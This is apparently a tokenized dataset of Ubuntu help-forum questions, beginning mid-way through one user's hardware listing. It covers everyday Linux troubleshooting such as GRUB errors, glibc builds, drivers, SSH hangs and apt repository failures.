7 series/c210 series chipset family smbus controller vendor : intel corporation physical id : 1f.3 bus info : pci @ 0000:00:1f.3 version : 04 width : 64 bits clock : 33mhz configuration : latency=0 resources : memory : f7115000-f71150ff ioport : f000 ( size=32 ) *-scsi:0 physical id : 1 logical name : scsi0 capabilities : emulated *-disk description : ata disk product : hitachi hds72302 vendor : hitachi physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : mn6o serial : mn1240fa0bs79d size : 1863gib ( 2tb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 sectorsize=512 signature=2b17f296 *-volume:0 description : windows ntfs volume physical id : 1 bus info : scsi @ 0:0.0.0,1 logical name : /dev/sda1 version : 3.1 serial : 4af3f545-ebaf-654d-aa76-4738368fe647 size : 198mib capacity : 200mib capabilities : primary bootable ntfs initialized configuration : clustersize=4096 created=2012-05-18 04:49:53 filesystem=ntfs label=system_drv state=clean *-volume:1 description : windows ntfs volume physical id : 2 bus info : scsi @ 0:0.0.0,2 logical name : /dev/sda2 version : 3.1 serial : 166844d0-ea46-fc46-b388-d6d4aa30fbbd size : 1075gib capacity : 1075gib capabilities : primary ntfs initialized configuration : clustersize=4096 created=2012-05-18 04:49:57 filesystem=ntfs modified_by_chkdsk=true mounted_on_nt4=true resize_log_file=true state=dirty upgrade_on_mount=true *-volume:2 description : windows ntfs volume physical id : 3 bus info : scsi @ 0:0.0.0,3 logical name : /dev/sda3 version : 3.1 serial : 80c8c3a4-0168-d24b-9e77-6d2343063263 size : 24gib capacity : 25gib capabilities : primary boot ntfs initialized configuration : clustersize=4096 created=2012-05-18 04:49:21 filesystem=ntfs label=lenovo_part state=clean *-volume:3 description : extended partition physical id : 4 bus info : scsi @ 0:0.0.0,4 logical name : /dev/sda4 size : 762gib capacity : 762gib capabilities : primary extended partitioned partitioned : extended *-logicalvolume:0 description : linux swap / solaris partition physical id : 5 logical name : /dev/sda5 capacity : 15gib capabilities : nofs *-logicalvolume:1 description : linux filesystem partition physical id : 6 logical name : /dev/sda6 logical name : / capacity : 9765mib configuration : mount.fstype=ext4 mount.options=rw , relatime , errors=remount-ro , data=ordered state=mounted *-logicalvolume:2 description : linux filesystem partition physical id : 7 logical name : /dev/sda7 logical name : /home capacity : 737gib configuration : mount.fstype=ext4 mount.options=rw , relatime , data=ordered state=mounted *-scsi:1 physical id : 2 logical name : scsi3 capabilities : emulated *-cdrom description : dvd-ram writer product : bd-re bh30n vendor : hl-dt-st physical id : 0.0.0 bus info : scsi @ 3:0.0.0 logical name : /dev/cdrom logical name : /dev/sr0 version : 2.01 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=nodisc *-scsi:2 physical id : 3 bus info : usb @ 2:1.7 logical name : scsi6 capabilities : emulated scsi-host configuration : driver=usb-storage *-disk:0 description : scsi disk product : storage device vendor : generic physical id : 0.0.0 bus info : scsi @ 6:0.0.0 logical name : /dev/sdb version : 0405 serial : 000000000505 capabilities : removable configuration : ansiversion=5 sectorsize=512 *-medium physical id : 0 logical name : /dev/sdb *-disk:1 description : scsi disk product : storage device vendor : generic physical id : 0.0.1 bus info : scsi @ 6:0.0.1 logical name : /dev/sdc version : 0405 serial : 000000000505 capabilities : removable configuration : ansiversion=5 sectorsize=512 *-medium physical id : 0 logical name : /dev/sdc *-network description : ethernet interface physical id : 1 logical name : ham0 serial : 7a:79:19 : d8:63:42 size : 10mbit/s capabilities : ethernet physical configuration : autonegotiation=off broadcast=yes driver=tun driverversion=1.6 duplex=full ip=25.216.99.66 link=yes multicast=yes port=twisted pair speed=10mbit/s thanks for any help you can give me . this issue has been bugging me for a while and i 'm finally fed up with it , so any solution would be a good solution considering how frustrated i am .
381004	glibc 2.18 configure warning	i 'm using ubuntu 12.04 lts . i 'm trying to install glibc-2.18 while ./configure it gives configure : error : you must configure in a separate build directory then i tried to configure in directory bla then it keeps repeating these lines : checking build system type ... ( cached ) x86_64-unknown-linux-gnu checking host system type ... ( cached ) x86_64-unknown-linux-gnu checking for dummy-gcc ... ( cached ) gcc checking for suffix of object files ... ( cached ) o checking whether we are using the gnu c compiler ... ( cached ) yes checking whether gcc accepts -g ... ( cached ) yes checking whether we are using the gnu c++ compiler ... ( cached ) yes checking whether g++ accepts -g ... ( cached ) yes checking for dummy-readelf ... ( cached ) readelf checking for sysdeps preconfigure fragments ... x86_64 configure : running configure fragment for add-on bla configure : warning : you should use -- build , -- host , -- target configure : warning : you should use -- build , -- host , -- target i 'm originally trying to installutorrent-server` which gives : ./utserver : /lib/x86_64-linux-gnu/libc.so.6 : version glibc_2.16 not found ( required by ./utserver ) how to fix this ?
381006	using quickly to build a web browser	i 've taken my first crack at building apps for ubuntu . i created a simple web browser using a video made by jono bacon . i was wondering if there is a list that i can download that has all of the commands that webkit can use in a python environment ?
381009	ca n't upgrade from 9.04	i just got ubuntu from my uncle and it is a older version 9.04 and i know to upgrade ubuntu it has to be in stages and i ca n't upgrade to 9.10 i always get fetch to fail error message saying ca n't connect to server ... are there any solutions ?
381010	separate linux drive is interfering with windows boot	i disconnected all my drives except an ssd i wished to install ubuntu on . after finished installation and loving 13.10 , powered off . then connected windows drive ( s ) . then rebooted intending to launch windows . as windows was preparing to boot , i get a message along the lines of windows loading files with a loading bar . after several seconds , i get kicked into the bios . i suspected that the ubuntu ssd was causing this . unplugging it resolved the issue . but i want to have my linux drive plugged in so i can choose to boot from it in the boot menu . ( i do not want a linux bootloader . ) can explain what is causing this and how i can resolve it ? sorry if this has been asked before but i am a linux novice . any input is greatly appreciated .
381014	using fire wire solo with ubuntu audacity	i have an hp 500 laptop running ubuntu 13.04 . i also have a fire wire solo m-audio sound card attached through a pcmcia card on my laptop , now how do i record on audacity using the m-audio fire wire solo as an input ? anticipating thanks
381015	how to extract matrices from qtoctave to libreoffice calc ?	i have a large matrices created using qtoctave which is simply impossible to rewrite it to spreadsheet program , just using copy-paste wo n't put each number into separate cell . how do i export these matrices to lo calc ?
381017	how to convert multiple files with winff ?	when i select one file to convert from `` .mpg '' format to `` .mp4 '' format in winff , it converts nice ! but when i try to convert many `` .mpg '' files , i see only one file in output folder ! and guess winff always rewrite on it ! ... how i can solve this problem ?
381018	grub_rescue error : unknown filesystem , error loading operating system	i had windows 7 and ubuntu 12.04 installed in my system . i removed ubuntu and installed it again . when i restarted the system , its showing error : unknown filesystem grub rescue > i used ls command and i am getting this ( hd0 ) , ( hd0 , msdos8 ) , ( hd0 , msdos7 ) ( hd0 , msdos6 ) ( hd0 , msdos5 ) ( hd0 , msdos4 ) ( hd0 , msdos3 ) ( hd0 , msdos2 ) ( hd0 , msdos1 ) but when i give `` ls ( hd0 ) / `` its saying unknown partition . the same case for rest ( hd0 , msdos1 ) to ( hd0 , msdos8 ) . i tried booting a new os from usb , and i am getting '' error loading operating system '' i also tried super grub from usb , still the same error `` error loading operating system '' please let me know what to do now . thanks in advance
381019	prompt for setup on first boot	i would like to have ubuntu set its self up when it boots , as windows does . there is a laptop that i am giving to a kid on christmas with a dead hard drive , and i would like to prepare it for him . the laptop is not currently in my possession , but the hard drive is . i can do the troubleshooting for him if drivers are necessary later , but i would like the hard drive to have ubuntu installed on it and just needing configuration with users and passwords . i have seen something like what i want before , but it was by a wubi install , and it did not prompt for a username and password to create . so , if that confused you , my goal is to have the computer when it boots to prompt for a username and password to create . i have an idea that could work , but not as well as desired . currently , i have a live cd of ubuntu 13.10 , and i was planning on putting the hard drive in my laptop as its only , booting from a live usb , wiping the hard drive , creating a 512 mb partition leaving the rest blank , and burning a live cd to that hard drive to boot from . so , i would want to tweak the live hd 's install to not allow the option for try ubuntu . i would prefer this to be on 13.10 because i have been using it flawlessly for the past month or two , and it has many features he would like . i am ok if it is only possible on 12.04 . so , to present all my questions can i install ubuntu without a user , but prompt for one on first boot or , can i install ubuntu from a hard drive as a live cd to itself if one of them gets answered , but not the other please answer the other one if you can for anyone else looking at this post . i will be trying the second method tonight possibly and answer below .
381022	safe to install linux kernel 3.12 ?	linux kernel 3.12 is released but it 's not available on ubuntu 's software updater . i can install it by this , but is it safe to install ? i mean will it stable as 3.11 ? my current system is ubuntu 13.10 64bit with linux kernel 3.11 . thanks .
381025	drivers on ubuntu saucy salamander	i have a hp probook 445g1 notebook . it came pre-installed with ubuntu 12.4 lts . i removed it and installed ubuntu 13.10.now there are no wifi and bluetooth drivers , help me fix it , i am a total noob to ubuntu . i checked the linux page , there is no bluetooth driver there , and i do not know how to install the wifi ones , and without these drivers the hardware wo n't switch on [ i tried pressing the buttons many times ] , please help me . if you require any more info . please tell me what and how ... here 's what i received when i did : lspci -nn ; rfkill list 00:00.0 host bridge [ 0600 ] : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor root complex [ 1022:1410 ] 00:01.0 vga compatible controller [ 0300 ] : advanced micro devices , inc. [ amd/ati ] richland [ radeon hd 8450g ] [ 1002:9995 ] 00:01.1 audio device [ 0403 ] : advanced micro devices , inc. [ amd/ati ] trinity hdmi audio controller [ 1002:9902 ] 00:04.0 pci bridge [ 0604 ] : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor root port [ 1022:1414 ] 00:05.0 pci bridge [ 0604 ] : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor root port [ 1022:1415 ] 00:07.0 pci bridge [ 0604 ] : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor root port [ 1022:1417 ] 00:10.0 usb controller [ 0c03 ] : advanced micro devices , inc. [ amd ] fch usb xhci controller [ 1022:7814 ] ( rev 09 ) 00:10.1 usb controller [ 0c03 ] : advanced micro devices , inc. [ amd ] fch usb xhci controller [ 1022:7814 ] ( rev 09 ) 00:11.0 sata controller [ 0106 ] : advanced micro devices , inc. [ amd ] fch sata controller [ ahci mode ] [ 1022:7801 ] ( rev 40 ) 00:12.0 usb controller [ 0c03 ] : advanced micro devices , inc. [ amd ] fch usb ohci controller [ 1022:7807 ] ( rev 11 ) 00:12.2 usb controller [ 0c03 ] : advanced micro devices , inc. [ amd ] fch usb ehci controller [ 1022:7808 ] ( rev 11 ) 00:13.0 usb controller [ 0c03 ] : advanced micro devices , inc. [ amd ] fch usb ohci controller [ 1022:7807 ] ( rev 11 ) 00:13.2 usb controller [ 0c03 ] : advanced micro devices , inc. [ amd ] fch usb ehci controller [ 1022:7808 ] ( rev 11 ) 00:14.0 smbus [ 0c05 ] : advanced micro devices , inc. [ amd ] fch smbus controller [ 1022:780b ] ( rev 16 ) 00:14.2 audio device [ 0403 ] : advanced micro devices , inc. [ amd ] fch azalia controller [ 1022:780d ] ( rev 01 ) 00:14.3 isa bridge [ 0601 ] : advanced micro devices , inc. [ amd ] fch lpc bridge [ 1022:780e ] ( rev 11 ) 00:14.4 pci bridge [ 0604 ] : advanced micro devices , inc. [ amd ] fch pci bridge [ 1022:780f ] ( rev 40 ) 00:14.5 usb controller [ 0c03 ] : advanced micro devices , inc. [ amd ] fch usb ohci controller [ 1022:7809 ] ( rev 11 ) 00:18.0 host bridge [ 0600 ] : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor function 0 [ 1022:1400 ] 00:18.1 host bridge [ 0600 ] : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor function 1 [ 1022:1401 ] 00:18.2 host bridge [ 0600 ] : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor function 2 [ 1022:1402 ] 00:18.3 host bridge [ 0600 ] : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor function 3 [ 1022:1403 ] 00:18.4 host bridge [ 0600 ] : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor function 4 [ 1022:1404 ] 00:18.5 host bridge [ 0600 ] : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor function 5 [ 1022:1405 ] 01:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 0c ) 02:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5229 pci express card reader [ 10ec:5229 ] ( rev 01 ) 03:00.0 network controller [ 0280 ] : ralink corp. rt3290 wireless 802.11n 1t/1r pcie [ 1814:3290 ] 03:00.1 bluetooth [ 0d11 ] : ralink corp. rt3290 bluetooth [ 1814:3298 ] 0 : phy0 : wireless lan soft blocked : no hard blocked : no
381026	mythbuntu - mythmusic crashes pc on music scan	i have `` upgraded '' ( clean iinstall ) mythbuntu with mythtv 0.27 . when it scans for new music it crashes the frontend : nov 23 12:57:01 mythserver01 mythfrontend.real : mythfrontend [ 3375 ] : i corecontext main.cpp:227 ( runscan ) scanning '/var/lib/mythtv/music/ ' for music files nov 23 12:57:14 mythserver01 mythfrontend.real : mythfrontend [ 3725 ] : i thread_unknown signalhandling.cpp:194 ( sethandlerprivate ) setup interrupt handler nov 23 12:57:14 mythserver01 mythfrontend.real : mythfrontend [ 3725 ] : i thread_unknown signalhandling.cpp:194 ( sethandlerprivate ) setup terminated handler nov 23 12:57:14 mythserver01 mythfrontend.real : mythfrontend [ 3725 ] : i thread_unknown signalhandling.cpp:194 ( sethandlerprivate ) setup segmentation fault handler nov 23 12:57:14 mythserver01 mythfrontend.real : mythfrontend [ 3725 ] : i thread_unknown signalhandling.cpp:194 ( sethandlerprivate ) setup aborted handler nov 23 12:57:14 mythserver01 mythfrontend.real : mythfrontend [ 3725 ] : i thread_unknown signalhandling.cpp:194 ( sethandlerprivate ) setup bus error handler nov 23 12:57:14 mythserver01 mythfrontend.real : mythfrontend [ 3725 ] : i thread_unknown signalhandling.cpp:194 ( sethandlerprivate ) setup floating point exception handler nov 23 12:57:14 mythserver01 mythfrontend.real : mythfrontend [ 3725 ] : i thread_unknown signalhandling.cpp:194 ( sethandlerprivate ) setup illegal instruction handler nov 23 12:57:14 mythserver01 mythfrontend.real : mythfrontend [ 3725 ] : i thread_unknown signalhandling.cpp:194 ( sethandlerprivate ) setup real-time signal 0 handler nov 23 12:57:14 mythserver01 mythfrontend.real : mythfrontend [ 3725 ] : i thread_unknown signalhandling.cpp:194 ( sethandlerprivate ) setup user defined signal 1 handler nov 23 12:57:14 mythserver01 mythfrontend.real : mythfrontend [ 3725 ] : i thread_unknown signalhandling.cpp:194 ( sethandlerprivate ) setup user defined signal 2 handler nov 23 12:57:14 mythserver01 mythfrontend.real : mythfrontend [ 3725 ] : c thread_unknown mythcommandlineparser.cpp:2595 ( configurelogging ) mythfrontend version : fixes/0.27 [ v0.27-94-ga6c1d53 ] www.mythtv.org nov 23 12:57:14 mythserver01 mythfrontend.real : mythfrontend [ 3725 ] : c thread_unknown mythcommandlineparser.cpp:2597 ( configurelogging ) qt version : compile : 4.8.1 , runtime : 4.8.1 nov 23 12:57:14 mythserver01 mythfrontend.real : mythfrontend [ 3725 ] : n thread_unknown mythcommandlineparser.cpp:2599 ( configurelogging ) enabled verbose msgs : general nov 23 12:57:14 mythserver01 mythfrontend.real : mythfrontend [ 3725 ] : n thread_unknown logging.cpp:914 ( logstart ) setting log level to log_info nov 23 12:57:14 mythserver01 mythfrontend.real : mythfrontend [ 3725 ] : n thread_unknown mythdirs.cpp:55 ( initializemythdirs ) using runtime prefix = /usr i do n't get much from the log , but maybe someone has a clue how to scan music file details into the db without the frontend segfaulting ? thanks
381029	ubuntu 13.10 video good but sound choppy on nhl gamecenter live at 1600 kbps	i have an : amd dual core 2.4 ghz x64 4600+ 2 gb dual-channel ram , 7200-rpm hdd asus nforce 210 1gb 64-bit graphics card using a dvi connection gateway 24 '' 1920x1080 hd display . my internet is 3 mbits . when i set a live game on nhl gamecenter live to 1600 kbps , the video is just fine unless the camera is panning right from one end of the ice to the other in less than one second . in which case the video does stutter very slightly . but the announcers ' voices are slightly choppy , while the crowd noise and sounds of play on the ice are significantly choppy . can someone help me figure out what the problem is and how i can maybe solve it ?
381035	i am trying to install ubuntu 13.1 on a hyper-v vm and when the installer start the screen is un-eadable	i have downloaded the ubuntu iso and am trying to install it , but the install screen is unreadable , has anyone any ideas ? any help much appropriated andy as i said i was installing on hyper-v , i downloaded the iso image of the install disk and i attached the image to the virtual machine as a cd . the screen is definitely the install screen but is just not usable , the buttons are not even visible on the screen . sorry to reply this way but this forum is not very well written and is not working very well ! ! !
381036	connect to a webserver running in vmware	there a thing i made for work that need to work on iis and sql server . i want to do some work from home and i run linux mint so i thought i 'd install win7 in a vm and run the servers there . i have done this in reverse before ( linux on a win host ) and it work but now for some reason i ca n't connect to iss from the host . network adapter is configured to nat in vmware . i made sure iis is bound to all interface . having only recently switched to linux there is most likely things i do n't quite understand so i 'm running out of ideas . any help is appreciated .
381037	install windows 7 grub error	i need to let my roommate borrow one of my laptops . unfortunately , windows needs to be installed to this computer for him to operate normally . i followed this guide to get a windows 7 iso to a boot-able usb - http : //www.webupd8.org/2010/10/create-bootable-windows-7-usb-drive.html when i boot the laptop with this usb installed , i get this error : error : file '/boot/grub/i386-pc/normal.mod ' not found grub rescue > the target laptop is running ubuntu raring , and is 100 % ext4 . thanks in advance for any help ! nathan
381040	where 's runuser ?	i 'm making an upstart job , and i need to run an executable as another user . nothing fancy like su provides , and none of the mixed-up selinux contexts that come along with it . a quick internet search recommends runuser over su for this task , but runuser is nowhere to be found on ubuntu 13.10 . should i be using su on ubuntu -- will it be smart enough to avoid full authorization ? would a resulting job be portable to other distros , or will i run into selinux issues ? ultimately , what 's the best way to change users in an upstart job ? update apparently upstart > = 1.4 supports setuid and setgid , but they 're limited in that they affect all of the job pre-*/post-* scripts , not just the primary script/exec . it 'd still be nice to have a way to properly drop to another user for a single command . i 've considered using stop-start-daemon , but it overlaps too much with upstart and will likely cause expect to behave oddly .
381043	can no longer press windows key to launch dash , what to do ?	suddenly pressing windows key to launch dash not working on my ubuntu 13.10 , other shortcut works fine ( windows + 1 , windows + t , windows hold ) , i have tried to restart my computer but the problem persist . on 13.04 i can easily fix unity-related problem using unity -- reset , but i just tried it and now -- reset is deprecated ? how to fix this ?
381044	how to use cursorfx cursors in ubuntu ?	i have tried to use this converter , but i do n't know how to and there is n't any instruction how to either . how do you use it ? is there any other way to make a cursorfx file work ? ( like getting the .exe program to work or something ? )
381045	not able to resize , shrink partition as i installed ubuntu on my entire hdd	i am completely new to ubuntu . i installed ubuntu 12.04 on my hp pavilion dm4 2165dx . i was previously running windows 8 on my laptop . i did a complete format and installed ubuntu . but i installed it on my entire hdd and i was not able resize it using gpart also ... here is the image of my hdd in gparted ,
381049	mysql workbench ca n't create new connection	i ca n't create new connection in mysql workbench . when i create a new connection it ask mysql root password . when i type mysql root password it show me again `` login keying password '' . i hv no idea which password should try . i ald try with all possible password . but it does n't work . is there a way to create a new connection without typing in login keying password .
381054	why do i get 404 error on .canonical.com on some archive servers ?	i 've been having a broken package problem for a fair amount of time now , and it was giving me trouble earlier when i was trying to install rvm . after some searching , i opened the software sources manager `` gksu software-properties-gtk '' and unchecked the archive.canonical.com repositories from `` other software '' and i no longer have any broken packages . are these important repositories ? should i be worried about my installations health ? i 'm an ubuntu noob , so this is worrying me . it it matters , here were the `` sudo apt-get update '' errors : sudo apt-get update hit http : //dl.google.com stable release.gpg hit http : //dl.google.com stable release hit http : //dl.google.com stable/main amd64 packages hit http : //security.ubuntu.com precise-security release.gpg hit http : //us.archive.ubuntu.com precise release.gpg hit http : //us.archive.ubuntu.com precise-updates release.gpg hit http : //us.archive.ubuntu.com precise-backports release.gpg hit http : //dl.google.com stable/main i386 packages ign http : //dl.google.com stable/main translationindex hit http : //security.ubuntu.com precise-security release hit http : //us.archive.ubuntu.com precise release hit http : //extras.ubuntu.com precise release.gpg hit http : //archive.canonical.com precise release.gpg ign http : //archive.canonical.com [ distro ] release.gpg hit http : //ppa.launchpad.net precise release.gpg hit http : //us.archive.ubuntu.com precise-updates release hit http : //security.ubuntu.com precise-security/main sources hit http : //us.archive.ubuntu.com precise-backports release hit http : //us.archive.ubuntu.com precise/main sources hit http : //us.archive.ubuntu.com precise/restricted sources hit http : //us.archive.ubuntu.com precise/universe sources hit http : //us.archive.ubuntu.com precise/multiverse sources hit http : //us.archive.ubuntu.com precise/main amd64 packages hit http : //security.ubuntu.com precise-security/restricted sources hit http : //security.ubuntu.com precise-security/universe sources hit http : //security.ubuntu.com precise-security/multiverse sources hit http : //security.ubuntu.com precise-security/main amd64 packages hit http : //security.ubuntu.com precise-security/restricted amd64 packages hit http : //security.ubuntu.com precise-security/universe amd64 packages hit http : //security.ubuntu.com precise-security/multiverse amd64 packages hit http : //security.ubuntu.com precise-security/main i386 packages hit http : //security.ubuntu.com precise-security/restricted i386 packages hit http : //security.ubuntu.com precise-security/universe i386 packages hit http : //extras.ubuntu.com precise release hit http : //archive.canonical.com precise release hit http : //ppa.launchpad.net precise release hit http : //us.archive.ubuntu.com precise/restricted amd64 packages hit http : //us.archive.ubuntu.com precise/universe amd64 packages hit http : //us.archive.ubuntu.com precise/multiverse amd64 packages hit http : //us.archive.ubuntu.com precise/main i386 packages hit http : //us.archive.ubuntu.com precise/restricted i386 packages hit http : //us.archive.ubuntu.com precise/universe i386 packages hit http : //us.archive.ubuntu.com precise/multiverse i386 packages hit http : //us.archive.ubuntu.com precise/main translationindex hit http : //us.archive.ubuntu.com precise/multiverse translationindex hit http : //security.ubuntu.com precise-security/multiverse i386 packages hit http : //security.ubuntu.com precise-security/main translationindex hit http : //security.ubuntu.com precise-security/multiverse translationindex hit http : //security.ubuntu.com precise-security/restricted translationindex hit http : //us.archive.ubuntu.com precise/restricted translationindex hit http : //security.ubuntu.com precise-security/universe translationindex hit http : //us.archive.ubuntu.com precise/universe translationindex hit http : //us.archive.ubuntu.com precise-updates/main sources hit http : //us.archive.ubuntu.com precise-updates/restricted sources hit http : //us.archive.ubuntu.com precise-updates/universe sources hit http : //us.archive.ubuntu.com precise-updates/multiverse sources ign http : //archive.canonical.com [ distro ] release hit http : //extras.ubuntu.com precise/main sources hit http : //ppa.launchpad.net precise/main sources hit http : //us.archive.ubuntu.com precise-updates/main amd64 packages hit http : //us.archive.ubuntu.com precise-updates/restricted amd64 packages hit http : //us.archive.ubuntu.com precise-updates/universe amd64 packages hit http : //us.archive.ubuntu.com precise-updates/multiverse amd64 packages hit http : //security.ubuntu.com precise-security/main translation-en hit http : //security.ubuntu.com precise-security/multiverse translation-en hit http : //us.archive.ubuntu.com precise-updates/main i386 packages hit http : //us.archive.ubuntu.com precise-updates/restricted i386 packages hit http : //us.archive.ubuntu.com precise-updates/universe i386 packages hit http : //us.archive.ubuntu.com precise-updates/multiverse i386 packages hit http : //us.archive.ubuntu.com precise-updates/main translationindex ign http : //dl.google.com stable/main translation-en_us hit http : //security.ubuntu.com precise-security/restricted translation-en hit http : //us.archive.ubuntu.com precise-updates/multiverse translationindex hit http : //us.archive.ubuntu.com precise-updates/restricted translationindex hit http : //us.archive.ubuntu.com precise-updates/universe translationindex hit http : //us.archive.ubuntu.com precise-backports/restricted amd64 packages hit http : //us.archive.ubuntu.com precise-backports/main amd64 packages hit http : //us.archive.ubuntu.com precise-backports/multiverse amd64 packages hit http : //archive.canonical.com precise/partner sources hit http : //archive.canonical.com precise/partner amd64 packages hit http : //archive.canonical.com precise/partner i386 packages ign http : //archive.canonical.com precise/partner translationindex hit http : //extras.ubuntu.com precise/main amd64 packages hit http : //extras.ubuntu.com precise/main i386 packages ign http : //extras.ubuntu.com precise/main translationindex ign http : //dl.google.com stable/main translation-en hit http : //ppa.launchpad.net precise/main amd64 packages hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex hit http : //security.ubuntu.com precise-security/universe translation-en hit http : //us.archive.ubuntu.com precise-backports/universe amd64 packages hit http : //us.archive.ubuntu.com precise-backports/restricted i386 packages hit http : //us.archive.ubuntu.com precise-backports/main i386 packages hit http : //us.archive.ubuntu.com precise-backports/multiverse i386 packages hit http : //us.archive.ubuntu.com precise-backports/universe i386 packages hit http : //us.archive.ubuntu.com precise-backports/main translationindex hit http : //us.archive.ubuntu.com precise-backports/multiverse translationindex hit http : //us.archive.ubuntu.com precise-backports/restricted translationindex hit http : //us.archive.ubuntu.com precise-backports/universe translationindex hit http : //us.archive.ubuntu.com precise/main translation-en ign http : //archive.canonical.com [ distro ] /partner translationindex hit http : //us.archive.ubuntu.com precise/multiverse translation-en hit http : //us.archive.ubuntu.com precise/restricted translation-en hit http : //us.archive.ubuntu.com precise/universe translation-en hit http : //us.archive.ubuntu.com precise-updates/main translation-en hit http : //us.archive.ubuntu.com precise-updates/multiverse translation-en hit http : //us.archive.ubuntu.com precise-updates/restricted translation-en hit http : //us.archive.ubuntu.com precise-updates/universe translation-en hit http : //us.archive.ubuntu.com precise-backports/main translation-en hit http : //us.archive.ubuntu.com precise-backports/multiverse translation-en hit http : //us.archive.ubuntu.com precise-backports/restricted translation-en hit http : //us.archive.ubuntu.com precise-backports/universe translation-en ign http : //extras.ubuntu.com precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //extras.ubuntu.com precise/main translation-en err http : //archive.canonical.com [ distro ] /partner sources 404 not found [ ip : 91.189.92.150 80 ] err http : //archive.canonical.com [ distro ] /partner amd64 packages 404 not found [ ip : 91.189.92.150 80 ] err http : //archive.canonical.com [ distro ] /partner i386 packages 404 not found [ ip : 91.189.92.150 80 ] ign http : //ppa.launchpad.net precise/main translation-en ign http : //archive.canonical.com precise/partner translation-en_us ign http : //archive.canonical.com precise/partner translation-en ign http : //archive.canonical.com [ distro ] /partner translation-en_us ign http : //archive.canonical.com [ distro ] /partner translation-en w : failed to fetch http : //archive.canonical.com/dists/ [ distro ] /partner/source/sources 404 not found [ ip : 91.189.92.150 80 ] w : failed to fetch http : //archive.canonical.com/dists/ [ distro ] /partner/binary-amd64/packages 404 not found [ ip : 91.189.92.150 80 ] w : failed to fetch http : //archive.canonical.com/dists/ [ distro ] /partner/binary-i386/packages 404 not found [ ip : 91.189.92.150 80 ] e : some index files failed to download . they have been ignored , or old ones used instead .
381055	change global sound quality	i need to change ubuntu 's global audio settings specifically to 24 bit , 48000 hz , for a certain program to run . however when i go into system settings/sound there 's no way to change it . ubuntu 's a good system but changing settings can be frustrating , as i ca n't even find any . please help !
381062	terminal freezes on running apt-get or vim	i am using ubuntu 13.04 on my laptop . i ssh to my ec2 instance which is running ubuntu 12.04.3 and every time i run sudo apt-get update , it prints some lines and then the terminal freezes . ubuntu @ ubuntu : ~ $ sudo apt-get update hit http : //us-east-1.ec2.archive.ubuntu.com precise release.gpg hit http : //us-east-1.ec2.archive.ubuntu.com precise-updates release.gpg hit http : //us-east-1.ec2.archive.ubuntu.com precise release hit http : //us-east-1.ec2.archive.ubuntu.com precise-updates release hit http : //us-east-1.ec2.archive.ubuntu.com precise/main sources ( no further output ) similarly it freezes with a blank screen when open a file ( or new file ) in vim , while nano works perfectly fine . i would also like to point out that this was n't happening a day back and before this issue cropped up i ran sudo apt-get update & & sudo apt-get dist-upgrade on ec2 instance which worked fine as usual . this has made my aws instance unusable which is where i do most of my work . any ideas as to what might be causing this and what might fix it ? i have tried re-installing vim ( which works by the way ) but it still freezes , i feel helpless , please help me . note : interestingly , i can still edit files in vim , i just ca n't see anything happening on the terminal .
381065	install ubuntu overwriting an old windows8 trial partition	on my desktop i have two partition containing both windows8 , one of them is an expired trial . i 'm a windows based developer and i want to learn even some linux development stuff , so i want to install ubuntu and overwrite that expired window 8 version . at present when my computer boot there is a dual boot that let me to choose from which win8 start . can i use the same dual boot to choose between windows and ubuntu ? do i have to remove that dual boot ( do n't know how , but will investigate ) before installing ubuntu ? can i reuse the already present boot manager and must overwrite the useless partition with ubuntu ?
381066	ssh hangs when logging from a non-ubuntu server	i have a server equipped with ubuntu 12.04.3 lts . the os is newly installed . but i can not connect to it with ssh from any other non-ubuntu client include rhel , putty . when using ssh -v , the debug information is listed : openssh_4.3p2 , openssl 0.9.8e-fips-rhel5 01 jul 2008 debug1 : reading configuration data /home/hk/.ssh/config debug1 : reading configuration data /etc/ssh/ssh_config debug1 : applying options for * debug1 : connecting to ..*.32 [ ..*.32 ] port 22. debug1 : connection established . debug1 : identity file /home/hk/.ssh/identity type -1 debug1 : identity file /home/hk/.ssh/id_rsa type 1 debug1 : identity file /home/hk/.ssh/id_dsa type -1 debug1 : loaded 3 keys debug1 : remote protocol version 2.0 , remote software version openssh_5.9p1 debian-5ubuntu1.1 debug1 : match : openssh_5.9p1 debian-5ubuntu1.1 pat openssh* debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_4.3 debug1 : ssh2_msg_kexinit sent then the connection hangs . if connecting from a ubuntu , it will be ok . the sshd_config and ssh_config are completely the same to another ubuntu 12.04.2 lts server , which works very fine . where could the problem be ?
381067	can not add folders from my computer to be synced	on ubuntu 12.04 lts , when i open the ubuntu one client and click `` add a folder from this computer '' , then select the folder i want to sync and click `` open '' , nothing happens . the folder does not appear in the ubuntu one client or in my storage on the web . any help gratefully received .
381068	display issue after disconnecting extra monitor xfce	i am using xubuntu 13.10 ( just updated ) and before upgrading to it i installed and configured xfce to allow for an extra monitor to be used with my laptop . i was hoping that i could remove and reattach the monitor at will when i wished to use it at home and when i wanted to use it on the road . but , after i disconnected the extra monitor from the laptop , the bottom of my screen bugged out . it flickers and displays the top menu bar ( the mouse icon and all the tabs to open my active programs ) . it is not really a performance issue it is just annoying . i was wondering if i can maybe restart the driver to get rid of this problem or if it may be something else . if you wish to see any terminal output please give me the terminal command and i will get the output in edit updates .
